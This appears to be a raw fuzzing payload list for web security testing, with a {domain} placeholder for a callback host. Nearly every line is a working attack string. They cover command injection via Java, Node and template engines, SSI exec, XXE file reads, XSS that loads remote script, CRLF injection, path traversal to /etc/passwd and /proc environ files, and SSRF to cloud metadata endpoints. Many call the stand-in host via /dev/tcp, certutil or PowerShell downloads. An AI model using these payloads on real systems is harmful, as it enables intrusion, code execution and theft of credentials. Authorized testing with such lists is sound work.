new System.Diagnostics.ProcessStartInfo("powershell -c Invoke-WebRequest 'http://{domain}'");
new System.Diagnostics.ProcessStartInfo("timeout 9");
new System.Diagnostics.ProcessStartInfo("whoami");
:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()
:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('ping {domain}').toString()")()
#{"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"nslookup {domain}\"]).start()")}
#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval('new java.lang.ProcessBuilder[\'(java.lang.String[])\']([\'/bin/sh\',\'-c\',\'nslookup {domain}\']).start()')}
${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"nslookup {domain}\"]).start()")}
${''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval('new java.lang.ProcessBuilder[\'(java.lang.String[])\']([\'/bin/sh\',\'-c\',\'nslookup {domain}\']).start()')}
Runtime.getRuntime().exec('/bin/bash -c "true > /dev/tcp/{domain}/80"');
Runtime.getRuntime().exec('/bin/sh -c "true > /dev/tcp/{domain}/80"');
Runtime.getRuntime().exec('certutil -urlcache -f "http://{domain}"');
Runtime.getRuntime().exec('exec 6< /dev/tcp/{domain}/80');
Runtime.getRuntime().exec('id');
Runtime.getRuntime().exec('ping {domain} -c 2');
Runtime.getRuntime().exec('powershell -c (New-Object Net.WebClient).DownloadString(\"http://{domain}\")');
Runtime.getRuntime().exec('powershell -c Invoke-WebRequest \"http://{domain}\"');
Runtime.getRuntime().exec('printenv');
Runtime.getRuntime().exec('sleep 9');
System("printenv /")
T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
T(java.lang.Runtime).getRuntime().exec('ping {domain}')}
T(java.lang.System).getenv()
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('/bin/bash -c "true > /dev/tcp/{domain}/80"').getInputStream())
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('/bin/sh -c "true > /dev/tcp/{domain}/80"').getInputStream())
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('certutil -urlcache -f "http://{domain}"').getInputStream())
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('exec 6< /dev/tcp/{domain}/80').getInputStream())
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('ping {domain} -c 2').getInputStream())
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('powershell -c (New-Object Net.WebClient).DownloadString(\"http://{domain}\")').getInputStream())
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('powershell -c Invoke-WebRequest \"http://{domain}\"').getInputStream())
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())
java.lang.Runtime.exec('/bin/bash -c "true > /dev/tcp/{domain}/80");
java.lang.Runtime.exec('/bin/sh -c "true > /dev/tcp/{domain}/80");
java.lang.Runtime.exec('certutil -urlcache -f "http://{domain}"');
java.lang.Runtime.exec('exec 6< /dev/tcp/{domain}/80);
java.lang.Runtime.exec('id');
java.lang.Runtime.exec('ping {domain} -c 2);
java.lang.Runtime.exec('powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'));
java.lang.Runtime.exec('powershell -c Invoke-WebRequest 'http://{domain}');
java.lang.Runtime.exec('printenv');
java.lang.Runtime.exec('sleep 9');
}#{"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"nslookup {domain}\"]).start()")}#{
}#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval('new java.lang.ProcessBuilder[\'(java.lang.String[])\']([\'/bin/sh\',\'-c\',\'nslookup {domain}\']).start()')}#{
}${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"nslookup {domain}\"]).start()")}${
}${''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval('new java.lang.ProcessBuilder[\'(java.lang.String[])\']([\'/bin/sh\',\'-c\',\'nslookup {domain}\']).start()')}${
$HOME
$ENV{'HOME'}
%d
%s%s%s%s%s
{0}
%*.*s
%@
%n
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
${{<%[%'"}}%\
{% debug %}
{{settings.SECRET_KEY}}
{{7*'7'}}
{{7*7}}
${{7*7}}
<%= 7*7 %>
${{7*7}}
#{7*7}
{{1337*1337}}
${{1337*1337}}
<%= 1337*1337 %>
${{1337*1337}}
#{1337*1337}
{{7*7}}[7*7]
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
{{1337*1337}}[1337*1337]
{{1337*1337}}${1337*1337}<%= 1337*1337 %>${{1337*1337}}#{1337*1337}${{<%[%'"}}%\
}}{{7*7}}][7*7]
}}{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
}}{{1337*1337}}][1337*1337]
}}{{1337*1337}}${1337*1337}<%= 1337*1337 %>${{1337*1337}}#{1337*1337}${{<%[%'"}}%\
{{ get_user_file("C:\boot.ini") }}
{{ get_user_file("/etc/hosts") }}
{{ get_user_file("/etc/passwd") }}
{{person.secret}}
{{person.name}}
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
{{[] .__ Class __.__ base __.__ subclasses __ ()}}
%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27ping%20%{domain}%20%2Dc%202%27%29%3B%22%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0A%20%20%7B%7B%2Fwith%7D%7D%0A%7B%7B%2Fwith%7D%7D
${"freemarker.template.utility.Execute"?new()("id")}
${"freemarker.template.utility.Execute"?new()("printenv")}
${"freemarker.template.utility.Execute"?new()("ping {domain} -c 2")}
${"freemarker.template.utility.Execute"?new()("sleep 9")}
${"freemarker.template.utility.Execute"?new()("ping {domain} -c 2")}
${"freemarker.template.utility.Execute"?new()("sleep 9")}
${"freemarker.template.utility.Execute"?new()("/bin/bash -c 'true > /dev/tcp/{domain}/80'")}
${"freemarker.template.utility.Execute"?new()("/bin/sh -c 'true > /dev/tcp/{domain}/80'")}
${"freemarker.template.utility.Execute"?new()("certutil -urlcache -f 'http://{domain}'")}
${"freemarker.template.utility.Execute"?new()("exec 6< /dev/tcp/{domain}/80")}
${"freemarker.template.utility.Execute"?new()("powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')")}
${"freemarker.template.utility.Execute"?new()("powershell -c Invoke-WebRequest 'http://{domain}'")}
<!DOCTYPE example [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>
%3C%21DOCTYPE%20example%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E
<!DOCTYPE example [<!ENTITY xxe SYSTEM "http://{domain}">]><root>&xxe;</root>
%3C%21DOCTYPE%20example%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22http%3A%2F%2F{domain}%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///proc/self/environ" >]><foo>&xxe;</foo>
<!--#exec cmd="/bin/bash -c 'true > /dev/tcp/{domain}/80'" -->
<!--#exec cmd="/bin/ls /" -->
<!--#exec cmd="/bin/sh -c 'true > /dev/tcp/{domain}/80'" -->
<!--#exec cmd="cat /etc/passwd" -->
<!--#exec cmd="cd C:\WINDOWS\System32">
<!--#exec cmd="certutil -urlcache -f 'http://{domain}'" -->
<!--#exec cmd="dir" -->
<!--#exec cmd="exec 6< /dev/tcp/{domain}/80" -->
<!--#exec cmd="id" -->
<!--#exec cmd="ls" -->
<!--#exec cmd="ping {domain}" -->
<!--#exec cmd="powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')" -->
<!--#exec cmd="powershell -c Invoke-WebRequest 'http://{domain}'" -->
<!--#exec cmd="printenv" -->
<!--#exec cmd="sleep" -->
<!--#exec cmd="timeout 5" -->
<pre><!--#echo var="DATE_LOCAL" --> </pre>
<pre><!--#exec cmd="/bin/bash -c 'true > /dev/tcp/{domain}/80'"--></pre>
<pre><!--#exec cmd="/bin/sh -c 'true > /dev/tcp/{domain}/80'"--></pre>
<pre><!--#exec cmd="cat /etc/passwd"--></pre>
<pre><!--#exec cmd="certutil -urlcache -f 'http://{domain}'"--></pre>
<pre><!--#exec cmd="dir" --></pre>
<pre><!--#exec cmd="exec 6< /dev/tcp/{domain}/80"--></pre>
<pre><!--#exec cmd="id"--></pre>
<pre><!--#exec cmd="ls" --></pre>
<pre><!--#exec cmd="ping {domain}"--></pre>
<pre><!--#exec cmd="powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')"--></pre>
<pre><!--#exec cmd="powershell -c Invoke-WebRequest 'http://{domain}'"--></pre>
<pre><!--#exec cmd="printenv"--></pre>
<pre><!--#exec cmd="sleep 9"--></pre>
<pre><!--#exec cmd="timeout 9" --></pre>
<pre><!--#exec cmd="whoami"--></pre>
<!--#config errmsg="File not found, informs users and password"-->
<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DOCUMENT_URI" -->
<!--#config timefmt="A %B %d %Y %r"-->
<!--#fsize file="ssi.shtml" -->
<!--#include file=?UUUUUUUU...UU?-->
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="whoami"-->
<!--#printenv -->
<!--#flastmod virtual="echo.html" -->
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=//{domain}/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://{domain}/data/news.xml" stylesheet="http://{domain}//news_template.xsl"></esi:include>
javascript:/*-- >]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img - /style=a:expression&#40&#47&#42'/- /*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name)onclick=eval(name) onmouseover=eval(name) onbegin=eval(name)background=javascript:eval(name)//>"
<img src=//{domain}>
<script>prompt()</script>
"'`><img src=x onerror=prompt() />
"'`><img src=//{domain} onerror=prompt() />
" onclick=alert() a="
'"><img src=//{domain} onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=//{domain} onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="//{domain}"onerror=eval(id&%23x29;>'"><img src="http://{domain}">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
"'`><ImG Src=//{domain} OnerRor=ProMpt(DoCumEnt.DoMAIn)
javascript:alert(1)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
<scRiPt src=//{domain}></scRiPt>
"><scRiPt src=//{domain}></scRiPt>
`><scRiPt src=//{domain}></scRiPt>
"'`><scRiPt src=//{domain}></scRiPt>
JAvasCripT:eval('var a=document.createElement(\'scrIpT\');a.src='//{domain}\';document.body.appendChild(a)')
<ScrIPt>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//{domain}");a.send();</sCrIPt>
<sCrIpt>$.getScript("//{domain}")</sCRipt>
</script><svg/onload='+/"/+/onmouseover=1/
+(s=document.createElement(/script/.source),s.stack=Error().stack,
s.src=(/,/+/{domain}/).slice(2),
document.documentElement.appendChild(s))//'>
</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.stack=Error().stack,s.src=(/,/+/{domain}/).slice(2),document.documentElement.appendChild(s))//'>
input[value='\">\<script>prompt(1)//>\"']
<ScRiPT src=//{domain}></ScRiPT>
<ScRiPT>$.getScRiPT("//{domain}")</ScRiPT>
"'`'><ScRiPT src=//{domain}></ScRiPT>
"'`><ScRiPT>$.getScRiPT("//{domain}")</ScRiPT>
/*-/*`/*\`/*'/*"/**/<ScRiPT src=//{domain}></ScRiPT>
/*-/*`/*\`/*'/*"/**/<ScRiPT>$.getScRiPT("//{domain}")</ScRiPT>
/*-/*`/*\`/*'/*"/**/><ScRiPT src=//{domain}></ScRiPT>
/*-/*`/*\`/*'/*"/**/><ScRiPT>$.getScRiPT("//{domain}")</ScRiPT>
//%0D%0A%0d%0a//<ScRiPT src=//{domain}></ScRiPT>
//%0D%0A%0d%0a//<ScRiPT>$.getScRiPT("//{domain}")</ScRiPT>
//%0D%0A%0d%0a//><ScRiPT src=//{domain}></ScRiPT>
//%0D%0A%0d%0a//><ScRiPT>$.getScRiPT("//{domain}")</ScRiPT>
%0d%0aLocation:%20//{domain}
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`/bin/bash -c "true > /dev/tcp/{domain}/80"`).toString());">
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`/bin/sh -c "true > /dev/tcp/{domain}/80"`).toString());">
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`certutil -urlcache -f 'http://{domain}'`).toString());">
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`exec 6< /dev/tcp/{domain}/80`).toString());">
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`id`).toString());">
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`ping {domain} -c 2`).toString());">
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')`).toString());">
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`powershell -c Invoke-WebRequest 'http://{domain}'`).toString());">
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`printenv`).toString());">
"'`><img src=//{domain} onerror="confirm(require('child_process').execSync(`sleep 9`).toString());">
/etc/passwd
../etc/passwd
../../etc/passwd
../../../../etc/passwd
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc\hosts
/etc/hostname
../etc/hostname
../../etc/hostname
../../../../etc/hostname
....//etc/hostname
....//....//etc/hostname
....//....//....//etc/hostname
../../../../../../etc/hosts
../../../../../../proc/self/environ
..\..\..\..\..\..\proc\self\environ
/proc/self/environ
../proc/self/environ
../../proc/self/environ
../../../../proc/self/environ
....//proc/self/environ
....//....//proc/self/environ
....//....//....//proc/self/environ
../../../../../../proc/1/environ
..\..\..\..\..\..\proc\1\environ
/proc/1/environ
../proc/1/environ
../../proc/1/environ
../../../../proc/1/environ
....//proc/1/environ
....//....//proc/1/environ
....//....//....//proc/1/environ
../../../../../../proc/2/environ
..\..\..\..\..\..\proc\2\environ
/proc/2/environ
../proc/2/environ
../../proc/2/environ
../../../../proc/2/environ
....//proc/2/environ
....//....//proc/2/environ
....//....//....//proc/2/environ
../../../../../../proc/3/environ
..\..\..\..\..\..\proc\3\environ
/proc/3/environ
../proc/3/environ
../../proc/3/environ
../../../../proc/3/environ
....//proc/3/environ
....//....//proc/3/environ
....//....//....//proc/3/environ
../../../../../../proc/4/environ
..\..\..\..\..\..\proc\4\environ
/proc/4/environ
../proc/4/environ
../../proc/4/environ
../../../../proc/4/environ
....//proc/4/environ
....//....//proc/4/environ
....//....//....//proc/4/environ
../../../../../../proc/5/environ
..\..\..\..\..\..\proc\5\environ
/proc/5/environ
../proc/5/environ
../../proc/5/environ
../../../../proc/5/environ
....//proc/5/environ
....//....//proc/5/environ
....//....//....//proc/5/environ
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://{domain}
\\{domain}
{white-listed-domain}
{white-listed-domain}.{domain}
https://{domain}
//{domain}
http://169.254.169.254
http://169.254.169.254/
//169.254.169.254/
\\169.254.169.254/
http://169.254.169.254/metadata
http://169.254.169.254/metadata/
//169.254.169.254/metadata/
\\169.254.169.254/metadata\
http://169.254.169.254/latest/metadata
http://169.254.169.254/latest/metadata/
//169.254.169.254/latest/metadata
\\169.254.169.254\latest\metadata
http://169.254.169.254/metadata/v1
http://169.254.169.254/metadata/v1/
//169.254.169.254/metadata/v1/
\\169.254.169.254\metadata\v1\
http://metadata.google.internal/computeMetadata/v1
http://metadata.google.internal/computeMetadata/v1/
//metadata.google.internal/computeMetadata/v1
\\metadata.google.internal\computeMetadata\v1
http://169.254.170.2/v4/metadata
http://169.254.170.2/v4/metadata/
//169.254.170.2/v4/metadata/
\\169.254.170.2\v4\metadata\
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../../etc/passwd%00
....//etc/passwd%00
....//....//etc/passwd%00
....//....//....//etc/passwd%00
../../../../../../etc/hosts%00
..\..\..\..\..\..\etc\hosts%00
/etc/hostname%00
../etc/hostname%00
../../etc/hostname%00
../../../../etc/hostname%00
....//etc/hostname%00
....//....//etc/hostname%00
....//....//....//etc/hostname%00
../../../../../../etc/hosts%00
../../../../../../proc/self/environ%00
..\..\..\..\..\..\proc\self\environ%00
/proc/self/environ%00
../proc/self/environ%00
../../proc/self/environ%00
../../../../proc/self/environ%00
....//proc/self/environ%00
....//....//proc/self/environ%00
....//....//....//proc/self/environ%00
../../../../../../proc/1/environ%00
..\..\..\..\..\..\proc\1\environ%00
/proc/1/environ%00
../proc/1/environ%00
../../proc/1/environ%00
../../../../proc/1/environ%00
....//proc/1/environ%00
....//....//proc/1/environ%00
....//....//....//proc/1/environ%00
../../../../../../proc/2/environ%00
..\..\..\..\..\..\proc\2\environ%00
/proc/2/environ%00
../proc/2/environ%00
../../proc/2/environ%00
../../../../proc/2/environ%00
....//proc/2/environ%00
....//....//proc/2/environ%00
....//....//....//proc/2/environ%00
../../../../../../proc/3/environ%00
..\..\..\..\..\..\proc\3\environ%00
/proc/3/environ%00
../proc/3/environ%00
../../proc/3/environ%00
../../../../proc/3/environ%00
....//proc/3/environ%00
....//....//proc/3/environ%00
....//....//....//proc/3/environ%00
../../../../../../proc/4/environ%00
..\..\..\..\..\..\proc\4\environ%00
/proc/4/environ%00
../proc/4/environ%00
../../proc/4/environ%00
../../../../proc/4/environ%00
....//proc/4/environ%00
....//....//proc/4/environ%00
....//....//....//proc/4/environ%00
../../../../../../proc/5/environ%00
..\..\..\..\..\..\proc\5\environ%00
/proc/5/environ%00
../proc/5/environ%00
../../proc/5/environ%00
../../../../proc/5/environ%00
....//proc/5/environ%00
....//....//proc/5/environ%00
....//....//....//proc/5/environ%00
C:/windows/system32/drivers/etc/hosts%00
../../../../../../windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
http://{domain}%00
\\{domain}%00
{white-listed-domain}%00
{white-listed-domain}.{domain}%00
https://{domain}%00
//{domain}%00
http://169.254.169.254%00
http://169.254.169.254/%00
//169.254.169.254/%00
\\169.254.169.254/%00
http://169.254.169.254/metadata%00
http://169.254.169.254/metadata/%00
//169.254.169.254/metadata/%00
\\169.254.169.254/metadata\%00
http://169.254.169.254/latest/metadata%00
http://169.254.169.254/latest/metadata/%00
//169.254.169.254/latest/metadata%00
\\169.254.169.254\latest\metadata%00
http://169.254.169.254/metadata/v1%00
http://169.254.169.254/metadata/v1/%00
//169.254.169.254/metadata/v1/%00
\\169.254.169.254\metadata\v1\%00
http://metadata.google.internal/computeMetadata/v1%00
http://metadata.google.internal/computeMetadata/v1/%00
//metadata.google.internal/computeMetadata/v1%00
\\metadata.google.internal\computeMetadata\v1%00
http://169.254.170.2/v4/metadata%00
http://169.254.170.2/v4/metadata/%00
//169.254.170.2/v4/metadata/%00
\\169.254.170.2\v4\metadata\%00
%E2%A0%80%0A%E2%A0%80
undefined
undef
null
NULL
(null)
nil
NIL
true
false
True
False
TRUE
FALSE
None
hasOwnProperty
\
\\
'
"
''
""
'"'
"''''"'"
"'"'"''''"
<foo val=“bar” />
<foo val=“bar” />
<foo val=”bar“ />
<foo val=`bar' />
